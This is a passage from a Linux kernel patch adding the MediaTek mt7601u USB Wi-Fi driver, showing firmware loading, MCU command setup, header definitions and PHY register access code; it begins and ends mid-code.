le32_to_cpu(hdr->dlm_len); + + if (fw->size != len) + goto err_inv_fw; + + val = le16_to_cpu(hdr->fw_ver); + dev_info(dev->dev, + "Firmware Version: %d.%d.%02d Build: %x Build time: %.16s\n", + (val >> 12) & 0xf, (val >> 8) & 0xf, val & 0xf, + le16_to_cpu(hdr->build_ver), hdr->build_time); + + len = le32_to_cpu(hdr->ilm_len); + + mt7601u_wr(dev, 0x94c, 0); + mt7601u_wr(dev, MT_FCE_PSE_CTRL, 0); + + mt7601u_vendor_reset(dev); + msleep(5); + + mt7601u_wr(dev, 0xa44, 0); + mt7601u_wr(dev, 0x230, 0x84210); + mt7601u_wr(dev, 0x400, 0x80c00); + mt7601u_wr(dev, 0x800, 1); + + mt7601u_rmw(dev, MT_PBF_CFG, 0, (MT_PBF_CFG_TX0Q_EN | + MT_PBF_CFG_TX1Q_EN | + MT_PBF_CFG_TX2Q_EN | + MT_PBF_CFG_TX3Q_EN)); + + mt7601u_wr(dev, MT_FCE_PSE_CTRL, 1); + + mt7601u_wr(dev, MT_USB_DMA_CFG, (MT_USB_DMA_CFG_RX_BULK_EN | + MT_USB_DMA_CFG_TX_BULK_EN)); + val = mt76_set(dev, MT_USB_DMA_CFG, MT_USB_DMA_CFG_TX_CLR); + val &= ~MT_USB_DMA_CFG_TX_CLR; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); + + /* FCE tx_fs_base_ptr */ + mt7601u_wr(dev, MT_TX_CPU_FROM_FCE_BASE_PTR, 0x400230); + /* FCE tx_fs_max_cnt */ + mt7601u_wr(dev, MT_TX_CPU_FROM_FCE_MAX_COUNT, 1); + /* FCE pdma enable */ + mt7601u_wr(dev, MT_FCE_PDMA_GLOBAL_CONF, 0x44); + /* FCE skip_fs_en */ + mt7601u_wr(dev, MT_FCE_SKIP_FS, 3); + + ret = mt7601u_upload_firmware(dev, (const struct mt76_fw *)fw->data); + + release_firmware(fw); + + return ret; + +err_inv_fw: + dev_err(dev->dev, "Invalid firmware image\n"); + release_firmware(fw); + return -ENOENT; +} + +int mt7601u_mcu_init(struct mt7601u_dev *dev) +{ + int ret; + + mutex_init(&dev->mcu.mutex); + + ret = mt7601u_load_firmware(dev); + if (ret) + return ret; + + set_bit(MT7601U_STATE_MCU_RUNNING, &dev->state); + + return 0; +} + +int mt7601u_mcu_cmd_init(struct mt7601u_dev *dev) +{ + int ret; + + ret = mt7601u_mcu_function_select(dev, Q_SELECT, 1); + if (ret) + return ret; + + init_completion(&dev->mcu.resp_cmpl); + if (mt7601u_usb_alloc_buf(dev, MCU_RESP_URB_SIZE, &dev->mcu.resp)) { + mt7601u_usb_free_buf(dev, &dev->mcu.resp); + return -ENOMEM; + } + + ret = mt7601u_usb_submit_buf(dev, USB_DIR_IN, MT_EP_IN_CMD_RESP, + &dev->mcu.resp, GFP_KERNEL, + mt7601u_complete_urb, &dev->mcu.resp_cmpl); + if (ret) { + mt7601u_usb_free_buf(dev, &dev->mcu.resp); + return ret; + } + + return 0; +} + +void mt7601u_mcu_cmd_deinit(struct mt7601u_dev *dev) +{ + usb_kill_urb(dev->mcu.resp.urb); + mt7601u_usb_free_buf(dev, &dev->mcu.resp); +} diff --git a/drivers/net/wireless/mediatek/mt7601u/mcu.h b/drivers/net/wireless/mediatek/mt7601u/mcu.h new file mode 100644 index 000000000000..4a66d1092a18 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mcu.h @@ -0,0 +1,94 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#ifndef __MT7601U_MCU_H +#define __MT7601U_MCU_H + +struct mt7601u_dev; + +/* Register definitions */ +#define MT_MCU_RESET_CTL 0x070C +#define MT_MCU_INT_LEVEL 0x0718 +#define MT_MCU_COM_REG0 0x0730 +#define MT_MCU_COM_REG1 0x0734 +#define MT_MCU_COM_REG2 0x0738 +#define MT_MCU_COM_REG3 0x073C + +#define MT_MCU_IVB_SIZE 0x40 +#define MT_MCU_DLM_OFFSET 0x80000 + +#define MT_MCU_MEMMAP_WLAN 0x00410000 +#define MT_MCU_MEMMAP_BBP 0x40000000 +#define MT_MCU_MEMMAP_RF 0x80000000 + +#define INBAND_PACKET_MAX_LEN 192 + +enum mcu_cmd { + CMD_FUN_SET_OP = 1, + CMD_LOAD_CR = 2, + CMD_INIT_GAIN_OP = 3, + CMD_DYNC_VGA_OP = 6, + CMD_TDLS_CH_SW = 7, + CMD_BURST_WRITE = 8, + CMD_READ_MODIFY_WRITE = 9, + CMD_RANDOM_READ = 10, + CMD_BURST_READ = 11, + CMD_RANDOM_WRITE = 12, + CMD_LED_MODE_OP = 16, + CMD_POWER_SAVING_OP = 20, + CMD_WOW_CONFIG = 21, + CMD_WOW_QUERY = 22, + CMD_WOW_FEATURE = 24, + CMD_CARRIER_DETECT_OP = 28, + CMD_RADOR_DETECT_OP = 29, + CMD_SWITCH_CHANNEL_OP = 30, + CMD_CALIBRATION_OP = 31, + CMD_BEACON_OP = 32, + CMD_ANTENNA_OP = 33, +}; + +enum mcu_function { + Q_SELECT = 1, + ATOMIC_TSSI_SETTING = 5, +}; + +enum mcu_power_mode { + RADIO_OFF = 0x30, + RADIO_ON = 0x31, + RADIO_OFF_AUTO_WAKEUP = 0x32, + RADIO_OFF_ADVANCE = 0x33, + RADIO_ON_ADVANCE = 0x34, +}; + +enum mcu_calibrate { + MCU_CAL_R = 1, + MCU_CAL_DCOC, + MCU_CAL_LC, + MCU_CAL_LOFT, + MCU_CAL_TXIQ, + MCU_CAL_BW, + MCU_CAL_DPD, + MCU_CAL_RXIQ, + MCU_CAL_TXDCOC, +}; + +int mt7601u_mcu_init(struct mt7601u_dev *dev); +int mt7601u_mcu_cmd_init(struct mt7601u_dev *dev); +void mt7601u_mcu_cmd_deinit(struct mt7601u_dev *dev); + +int +mt7601u_mcu_calibrate(struct mt7601u_dev *dev, enum mcu_calibrate cal, u32 val); +int mt7601u_mcu_tssi_read_kick(struct mt7601u_dev *dev, int use_hvga); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/mt7601u.h b/drivers/net/wireless/mediatek/mt7601u/mt7601u.h new file mode 100644 index 000000000000..9102be6b95cb --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mt7601u.h @@ -0,0 +1,390 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#ifndef MT7601U_H +#define MT7601U_H + +#include +#include +#include +#include +#include +#include +#include + +#include "regs.h" +#include "util.h" + +#define MT_CALIBRATE_INTERVAL (4 * HZ) + +#define MT_FREQ_CAL_INIT_DELAY (30 * HZ) +#define MT_FREQ_CAL_CHECK_INTERVAL (10 * HZ) +#define MT_FREQ_CAL_ADJ_INTERVAL (HZ / 2) + +#define MT_BBP_REG_VERSION 0x00 + +#define MT_USB_AGGR_SIZE_LIMIT 28 /* * 1024B */ +#define MT_USB_AGGR_TIMEOUT 0x80 /* * 33ns */ +#define MT_RX_ORDER 3 +#define MT_RX_URB_SIZE (PAGE_SIZE << MT_RX_ORDER) + +struct mt7601u_dma_buf { + struct urb *urb; + void *buf; + dma_addr_t dma; + size_t len; +}; + +struct mt7601u_mcu { + struct mutex mutex; + + u8 msg_seq; + + struct mt7601u_dma_buf resp; + struct completion resp_cmpl; +}; + +struct mt7601u_freq_cal { + struct delayed_work work; + u8 freq; + bool enabled; + bool adjusting; +}; + +struct mac_stats { + u64 rx_stat[6]; + u64 tx_stat[6]; + u64 aggr_stat[2]; + u64 aggr_n[32]; + u64 zero_len_del[2]; +}; + +#define N_RX_ENTRIES 16 +struct mt7601u_rx_queue { + struct mt7601u_dev *dev; + + struct mt7601u_dma_buf_rx { + struct urb *urb; + struct page *p; + } e[N_RX_ENTRIES]; + + unsigned int start; + unsigned int end; + unsigned int entries; + unsigned int pending; +}; + +#define N_TX_ENTRIES 64 + +struct mt7601u_tx_queue { + struct mt7601u_dev *dev; + + struct mt7601u_dma_buf_tx { + struct urb *urb; + struct sk_buff *skb; + } e[N_TX_ENTRIES]; + + unsigned int start; + unsigned int end; + unsigned int entries; + unsigned int used; + unsigned int fifo_seq; +}; + +/* WCID allocation: + * 0: mcast wcid + * 1: bssid wcid + * 1...: STAs + * ...7e: group wcids + * 7f: reserved + */ +#define N_WCIDS 128 +#define GROUP_WCID(idx) (N_WCIDS - 2 - idx) + +struct mt7601u_eeprom_params; + +#define MT_EE_TEMPERATURE_SLOPE 39 +#define MT_FREQ_OFFSET_INVALID -128 + +enum mt_temp_mode { + MT_TEMP_MODE_NORMAL, + MT_TEMP_MODE_HIGH, + MT_TEMP_MODE_LOW, +}; + +enum mt_bw { + MT_BW_20, + MT_BW_40, +}; + +enum { + MT7601U_STATE_INITIALIZED, + MT7601U_STATE_REMOVED, + MT7601U_STATE_WLAN_RUNNING, + MT7601U_STATE_MCU_RUNNING, + MT7601U_STATE_SCANNING, + MT7601U_STATE_READING_STATS, + MT7601U_STATE_MORE_STATS, +}; + +/** + * struct mt7601u_dev - adapter structure + * @lock: protects @wcid->tx_rate. + * @tx_lock: protects @tx_q and changes of MT7601U_STATE_*_STATS + flags in @state. + * @rx_lock: protects @rx_q. + * @con_mon_lock: protects @ap_bssid, @bcn_*, @avg_rssi. + * @mutex: ensures exclusive access from mac80211 callbacks. + * @vendor_req_mutex: ensures atomicity of vendor requests. + * @reg_atomic_mutex: ensures atomicity of indirect register accesses + * (accesses to RF and BBP). + * @hw_atomic_mutex: ensures exclusive access to HW during critical + * operations (power management, channel switch). 
+ */ +struct mt7601u_dev { + struct ieee80211_hw *hw; + struct device *dev; + + unsigned long state; + + struct mutex mutex; + + unsigned long wcid_mask[N_WCIDS / BITS_PER_LONG]; + + struct cfg80211_chan_def chandef; + struct ieee80211_supported_band *sband_2g; + + struct mt7601u_mcu mcu; + + struct delayed_work cal_work; + struct delayed_work mac_work; + + struct workqueue_struct *stat_wq; + struct delayed_work stat_work; + + struct mt76_wcid *mon_wcid; + struct mt76_wcid __rcu *wcid[N_WCIDS]; + + spinlock_t lock; + + const u16 *beacon_offsets; + + u8 macaddr[ETH_ALEN]; + struct mt7601u_eeprom_params *ee; + + struct mutex vendor_req_mutex; + struct mutex reg_atomic_mutex; + struct mutex hw_atomic_mutex; + + u32 rxfilter; + u32 debugfs_reg; + + u8 out_eps[8]; + u8 in_eps[8]; + u16 out_max_packet; + u16 in_max_packet; + + /* TX */ + spinlock_t tx_lock; + struct mt7601u_tx_queue *tx_q; + + atomic_t avg_ampdu_len; + + /* RX */ + spinlock_t rx_lock; + struct tasklet_struct rx_tasklet; + struct mt7601u_rx_queue rx_q; + + /* Connection monitoring things */ + spinlock_t con_mon_lock; + u8 ap_bssid[ETH_ALEN]; + + s8 bcn_freq_off; + u8 bcn_phy_mode; + + int avg_rssi; /* starts at 0 and converges */ + + u8 agc_save; + + struct mt7601u_freq_cal freq_cal; + + bool tssi_read_trig; + + s8 tssi_init; + s8 tssi_init_hvga; + s16 tssi_init_hvga_offset_db; + + int prev_pwr_diff; + + enum mt_temp_mode temp_mode; + int curr_temp; + int dpd_temp; + s8 raw_temp; + bool pll_lock_protect; + + u8 bw; + bool chan_ext_below; + + /* PA mode */ + u32 rf_pa_mode[2]; + + struct mac_stats stats; +}; + +struct mt7601u_tssi_params { + char tssi0; + int trgt_power; +}; + +struct mt76_wcid { + u8 idx; + u8 hw_key_idx; + + u16 tx_rate; + bool tx_rate_set; + u8 tx_rate_nss; +}; + +struct mt76_vif { + u8 idx; + + struct mt76_wcid group_wcid; +}; + +struct mt76_sta { + struct mt76_wcid wcid; + u16 agg_ssn[IEEE80211_NUM_TIDS]; +}; + +struct mt76_reg_pair { + u32 reg; + u32 value; +}; + +struct mt7601u_rxwi; + +extern const struct ieee80211_ops mt7601u_ops; + +void mt7601u_init_debugfs(struct mt7601u_dev *dev); + +u32 mt7601u_rr(struct mt7601u_dev *dev, u32 offset); +void mt7601u_wr(struct mt7601u_dev *dev, u32 offset, u32 val); +u32 mt7601u_rmw(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val); +u32 mt7601u_rmc(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val); +void mt7601u_wr_copy(struct mt7601u_dev *dev, u32 offset, + const void *data, int len); + +int mt7601u_wait_asic_ready(struct mt7601u_dev *dev); +bool mt76_poll(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout); +bool mt76_poll_msec(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout); + +/* Compatibility with mt76 */ +#define mt76_rmw_field(_dev, _reg, _field, _val) \ + mt76_rmw(_dev, _reg, _field, MT76_SET(_field, _val)) + +static inline u32 mt76_rr(struct mt7601u_dev *dev, u32 offset) +{ + return mt7601u_rr(dev, offset); +} + +static inline void mt76_wr(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + return mt7601u_wr(dev, offset, val); +} + +static inline u32 +mt76_rmw(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val) +{ + return mt7601u_rmw(dev, offset, mask, val); +} + +static inline u32 mt76_set(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + return mt76_rmw(dev, offset, 0, val); +} + +static inline u32 mt76_clear(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + return mt76_rmw(dev, offset, val, 0); +} + +int mt7601u_write_reg_pairs(struct mt7601u_dev *dev, u32 base, + const struct mt76_reg_pair *data, 
int len); +int mt7601u_burst_write_regs(struct mt7601u_dev *dev, u32 offset, + const u32 *data, int n); +void mt7601u_addr_wr(struct mt7601u_dev *dev, const u32 offset, const u8 *addr); + +/* Init */ +struct mt7601u_dev *mt7601u_alloc_device(struct device *dev); +int mt7601u_init_hardware(struct mt7601u_dev *dev); +int mt7601u_register_device(struct mt7601u_dev *dev); +void mt7601u_cleanup(struct mt7601u_dev *dev); + +int mt7601u_mac_start(struct mt7601u_dev *dev); +void mt7601u_mac_stop(struct mt7601u_dev *dev); + +/* PHY */ +int mt7601u_phy_init(struct mt7601u_dev *dev); +int mt7601u_wait_bbp_ready(struct mt7601u_dev *dev); +void mt7601u_set_rx_path(struct mt7601u_dev *dev, u8 path); +void mt7601u_set_tx_dac(struct mt7601u_dev *dev, u8 path); +int mt7601u_bbp_set_bw(struct mt7601u_dev *dev, int bw); +void mt7601u_agc_save(struct mt7601u_dev *dev); +void mt7601u_agc_restore(struct mt7601u_dev *dev); +int mt7601u_phy_set_channel(struct mt7601u_dev *dev, + struct cfg80211_chan_def *chandef); +void mt7601u_phy_recalibrate_after_assoc(struct mt7601u_dev *dev); +int mt7601u_phy_get_rssi(struct mt7601u_dev *dev, + struct mt7601u_rxwi *rxwi, u16 rate); +void mt7601u_phy_con_cal_onoff(struct mt7601u_dev *dev, + struct ieee80211_bss_conf *info); + +/* MAC */ +void mt7601u_mac_work(struct work_struct *work); +void mt7601u_mac_set_protection(struct mt7601u_dev *dev, bool legacy_prot, + int ht_mode); +void mt7601u_mac_set_short_preamble(struct mt7601u_dev *dev, bool short_preamb); +void mt7601u_mac_config_tsf(struct mt7601u_dev *dev, bool enable, int interval); +void +mt7601u_mac_wcid_setup(struct mt7601u_dev *dev, u8 idx, u8 vif_idx, u8 *mac); +void mt7601u_mac_set_ampdu_factor(struct mt7601u_dev *dev); + +/* TX */ +void mt7601u_tx(struct ieee80211_hw *hw, struct ieee80211_tx_control *control, + struct sk_buff *skb); +int mt7601u_conf_tx(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + u16 queue, const struct ieee80211_tx_queue_params *params); +void mt7601u_tx_status(struct mt7601u_dev *dev, struct sk_buff *skb); +void mt7601u_tx_stat(struct work_struct *work); + +/* util */ +void mt76_remove_hdr_pad(struct sk_buff *skb); +int mt76_insert_hdr_pad(struct sk_buff *skb); + +u32 mt7601u_bbp_set_ctrlch(struct mt7601u_dev *dev, bool below); + +static inline u32 mt7601u_mac_set_ctrlch(struct mt7601u_dev *dev, bool below) +{ + return mt7601u_rmc(dev, MT_TX_BAND_CFG, 1, below); +} + +int mt7601u_dma_init(struct mt7601u_dev *dev); +void mt7601u_dma_cleanup(struct mt7601u_dev *dev); + +int mt7601u_dma_enqueue_tx(struct mt7601u_dev *dev, struct sk_buff *skb, + struct mt76_wcid *wcid, int hw_q); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/phy.c b/drivers/net/wireless/mediatek/mt7601u/phy.c new file mode 100644 index 000000000000..1908af6add87 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/phy.c @@ -0,0 +1,1251 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#include "mt7601u.h" +#include "mcu.h" +#include "eeprom.h" +#include "trace.h" +#include "initvals_phy.h" + +#include + +static void mt7601u_agc_reset(struct mt7601u_dev *dev); + +static int +mt7601u_rf_wr(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 value) +{ + int ret = 0; + + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state)) || + WARN_ON(offset > 63)) + return -EINVAL; + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 0; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_RF_CSR_CFG, MT_RF_CSR_CFG_KICK, 0, 100)) { + ret = -ETIMEDOUT; + goto out; + } + + mt7601u_wr(dev, MT_RF_CSR_CFG, MT76_SET(MT_RF_CSR_CFG_DATA, value) | + MT76_SET(MT_RF_CSR_CFG_REG_BANK, bank) | + MT76_SET(MT_RF_CSR_CFG_REG_ID, offset) | + MT_RF_CSR_CFG_WR | + MT_RF_CSR_CFG_KICK); + trace_rf_write(dev, bank, offset, value); +out: + mutex_unlock(&dev->reg_atomic_mutex); + + if (ret < 0) + dev_err(dev->dev, "Error: RF write %02hhx:%02hhx failed:%d!!\n", + bank, offset, ret); + + return ret; +} + +static int +mt7601u_rf_rr(struct mt7601u_dev *dev, u8 bank, u8 offset) +{ + int ret = -ETIMEDOUT; + u32 val; + + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state)) || + WARN_ON(offset > 63)) + return -EINVAL; + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 0xff; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_RF_CSR_CFG, MT_RF_CSR_CFG_KICK, 0, 100)) + goto out; + + mt7601u_wr(dev, MT_RF_CSR_CFG, MT76_SET(MT_RF_CSR_CFG_REG_BANK, bank) | + MT76_SET(MT_RF_CSR_CFG_REG_ID, offset) | + MT_RF_CSR_CFG_KICK); + + if (!mt76_poll(dev, MT_RF_CSR_CFG, MT_RF_CSR_CFG_KICK, 0, 100)) + goto out; + + val = mt7601u_rr(dev, MT_RF_CSR_CFG); + if (MT76_GET(MT_RF_CSR_CFG_REG_ID, val) == offset && + MT76_GET(MT_RF_CSR_CFG_REG_BANK, val) == bank) { + ret = MT76_GET(MT_RF_CSR_CFG_DATA, val); + trace_rf_read(dev, bank, offset, ret); + } +out: + mutex_unlock(&dev->reg_atomic_mutex); + + if (ret < 0) + dev_err(dev->dev, "Error: RF read %02hhx:%02hhx failed:%d!!\n", + bank, offset, ret); + + return ret; +} + +static int +mt7601u_rf_rmw(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 mask, u8 val) +{ + int ret; + + ret = mt7601u_rf_rr(dev, bank, offset); + if (ret < 0) + return ret; + val |= ret & ~mask; + ret = mt7601u_rf_wr(dev, bank, offset, val); + if (ret) + return ret; + + return val; +} + +static int +mt7601u_rf_set(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 val) +{ + return mt7601u_rf_rmw(dev, bank, offset, 0, val); +} + +static int +mt7601u_rf_clear(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 mask) +{ + return mt7601u_rf_rmw(dev, bank, offset, mask, 0); +} + +static void mt7601u_bbp_wr(struct mt7601u_dev *dev, u8 offset, u8 val) +{ + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state)) || + test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_BBP_CSR_CFG, MT_BBP_CSR_CFG_BUSY, 0, 1000)) { + dev_err(dev->dev, "Error: BBP write %02hhx failed!!\n", offset); + goto out; + } + + mt7601u_wr(dev, MT_BBP_CSR_CFG, + MT76_SET(MT_BBP_CSR_CFG_VAL, val) | + MT76_SET(MT_BBP_CSR_CFG_REG_NUM, offset) | + MT_BBP_CSR_CFG_RW_MODE | MT_BBP_CSR_CFG_BUSY); + trace_bbp_write(dev, offset, val); +out: + mutex_unlock(&dev->reg_atomic_mutex); +} + +static int mt7601u_bbp_rr(struct mt7601u_dev *dev, u8 offset) +{ + u32 val; + int ret = -ETIMEDOUT; + + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state))) + return -EINVAL; + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 
0xff; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_BBP_CSR_CFG, MT_BBP_CSR_CFG_BUSY, 0, 1000)) + goto out; + + mt7601u_wr(dev, MT_BBP_CSR_CFG, + MT76_SET(MT_BBP_CSR_CFG_REG_NUM, offset) | + MT_BBP_CSR_CFG_RW_MODE | MT_BBP_CSR_CFG_BUSY | + MT_BBP_CSR_CFG_READ); + + if (!mt76_poll(dev, MT_BBP_CSR_CFG, MT_BBP_CSR_CFG_BUSY, 0, 1000)) + goto out; + + val = mt7601u_rr(dev, MT_BBP_CSR_CFG); + if (MT76_GET(MT_BBP_CSR_CFG_REG_NUM, val) == offset) { + ret = MT76_GET(MT_BBP_CSR_CFG_VAL, val); + trace_bbp_read(dev, offset, ret); + } +out: + mutex_unlock(&dev->reg_atomic_mutex); + + if (ret < 0) + dev_err(dev->dev, "Error: BBP read %02hhx failed:%d!!\n", + offset, ret); + + return ret; +} + +static int mt7601u_bbp_rmw(struct mt7601u_dev *dev, u8 offset, u8 mask, u8 val) +{ + int ret; + + ret = mt7601u_bbp_rr(dev, offset); + if (ret < 0) + return ret; + val |= ret & ~mask; + mt7601u_bbp_wr(dev, offset, val); + + return val; +} + +static u8 mt7601u_bbp_rmc(struct mt7601u_dev *dev, u8 offset, u8 mask, u8 val) +{ + int ret; + + ret = mt7601u_bbp_rr(dev, offset); + if (ret < 0) + return ret; + val |= ret & ~mask; + if (ret != val) + mt7601u_bbp_wr(dev, offset, val); + + return val; +} + +int mt7601u_wait_bbp_ready(struct mt7601u_dev *dev) +{ + int i = 20; + u8 val; + + do { + val = mt7601u_bbp_rr(dev, MT_BBP_REG_VERSION); + if (val && ~val) + break; + } while (--i); + + if (!i) { + dev_err(dev->dev, "Error: BBP is not ready\n"); + return -EIO; + } + + return 0; +} + +u32 mt7601u_bbp_set_ctrlch(struct mt7601u_dev *dev, bool below) +{ + return mt7601u_bbp_rmc(dev, 3, 0x20, below ? 0x20 : 0); +} + +int mt7601u_phy_get_rssi(struct mt7601u_dev *dev, + struct mt7601u_rxwi *rxwi, u16 rate) +{ + static const s8 lna[2][2][3] = { + /* main LNA */ { + /* bw20 */ { -2, 15, 33 }, + /* bw40 */ { 0, 16, 34 } + }, + /* aux LNA */ { + /* bw20 */ { -2, 15, 33 }, + /* bw40 */ { -2, 16, 34 } + } + }; + int bw = MT76_GET(MT_RXWI_RATE_BW, rate); + int aux_lna = MT76_GET(MT_RXWI_ANT_AUX_LNA, rxwi->ant); + int lna_id = MT76_GET(MT_RXWI_GAIN_RSSI_LNA_ID, rxwi->gain); + int val; + + if (lna_id) /* LNA id can be 0, 2, 3. 
*/ + lna_id--; + + val = 8; + val -= lna[aux_lna][bw][lna_id]; + val -= MT76_GET(MT_RXWI_GAIN_RSSI_VAL, rxwi->gain); + val -= dev->ee->lna_gain; + val -= dev->ee->rssi_offset[0]; + + return val; +} + +static void mt7601u_vco_cal(struct mt7601u_dev *dev) +{ + mt7601u_rf_wr(dev, 0, 4, 0x0a); + mt7601u_rf_wr(dev, 0, 5, 0x20); + mt7601u_rf_set(dev, 0, 4, BIT(7)); + msleep(2); +} + +static int mt7601u_set_bw_filter(struct mt7601u_dev *dev, bool cal) +{ + u32 filter = 0; + int ret; + + if (!cal) + filter |= 0x10000; + if (dev->bw != MT_BW_20) + filter |= 0x00100; + + /* TX */ + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_BW, filter | 1); + if (ret) + return ret; + /* RX */ + return mt7601u_mcu_calibrate(dev, MCU_CAL_BW, filter); +} + +static int mt7601u_load_bbp_temp_table_bw(struct mt7601u_dev *dev) +{ + const struct reg_table *t; + + if (WARN_ON(dev->temp_mode > MT_TEMP_MODE_LOW)) + return -EINVAL; + + t = &bbp_mode_table[dev->temp_mode][dev->bw]; + + return mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, t->regs, t->n); +} + +static int mt7601u_bbp_temp(struct mt7601u_dev *dev, int mode, const char *name) +{ + const struct reg_table *t; + int ret; + + if (dev->temp_mode == mode) + return 0; + + dev->temp_mode = mode; + trace_temp_mode(dev, mode); + + t = bbp_mode_table[dev->temp_mode]; + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + t[2].regs, t[2].n); + if (ret) + return ret; + + return mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + t[dev->bw].regs, t[dev->bw].n); +} + +static void mt7601u_apply_ch14_fixup(struct mt7601u_dev *dev, int hw_chan) +{ + struct mt7601u_rate_power *t = &dev->ee->power_rate_table; + + if (hw_chan != 14 || dev->bw != MT_BW_20) { + mt7601u_bbp_rmw(dev, 4, 0x20, 0); + mt7601u_bbp_wr(dev, 178, 0xff); + + t->cck[0].bw20 = dev->ee->real_cck_bw20[0]; + t->cck[1].bw20 = dev->ee->real_cck_bw20[1]; + } else { /* Apply CH14 OBW fixup */ + mt7601u_bbp_wr(dev, 4, 0x60); + mt7601u_bbp_wr(dev, 178, 0); + + /* Note: vendor code is buggy here for negative values */ + t->cck[0].bw20 = dev->ee->real_cck_bw20[0] - 2; + t->cck[1].bw20 = dev->ee->real_cck_bw20[1] - 2; + } +} + +static int __mt7601u_phy_set_channel(struct mt7601u_dev *dev, + struct cfg80211_chan_def *chandef) +{ +#define FREQ_PLAN_REGS 4 + static const u8 freq_plan[14][FREQ_PLAN_REGS] = { + { 0x99, 0x99, 0x09, 0x50 }, + { 0x46, 0x44, 0x0a, 0x50 }, + { 0xec, 0xee, 0x0a, 0x50 }, + { 0x99, 0x99, 0x0b, 0x50 }, + { 0x46, 0x44, 0x08, 0x51 }, + { 0xec, 0xee, 0x08, 0x51 }, + { 0x99, 0x99, 0x09, 0x51 }, + { 0x46, 0x44, 0x0a, 0x51 }, + { 0xec, 0xee, 0x0a, 0x51 }, + { 0x99, 0x99, 0x0b, 0x51 }, + { 0x46, 0x44, 0x08, 0x52 }, + { 0xec, 0xee, 0x08, 0x52 }, + { 0x99, 0x99, 0x09, 0x52 }, + { 0x33, 0x33, 0x0b, 0x52 }, + }; + struct mt76_reg_pair channel_freq_plan[FREQ_PLAN_REGS] = { + { 17, 0 }, { 18, 0 }, { 19, 0 }, { 20, 0 }, + }; + struct mt76_reg_pair bbp_settings[3] = { + { 62, 0x37 - dev->ee->lna_gain }, + { 63, 0x37 - dev->ee->lna_gain }, + { 64, 0x37 - dev->ee->lna_gain }, + }; + + struct ieee80211_channel *chan = chandef->chan; + enum nl80211_channel_type chan_type = + cfg80211_get_chandef_type(chandef); + struct mt7601u_rate_power *t = &dev->ee->power_rate_table; + int chan_idx; + bool chan_ext_below; + u8 bw; + int i, ret; + + bw = MT_BW_20; + chan_ext_below = (chan_type == NL80211_CHAN_HT40MINUS); + chan_idx = chan->hw_value - 1; + + if (chandef->width == NL80211_CHAN_WIDTH_40) { + bw = MT_BW_40; + + if (chan_idx > 1 && chan_type == NL80211_CHAN_HT40MINUS) + chan_idx -= 2; + else if (chan_idx < 12 && chan_type == 
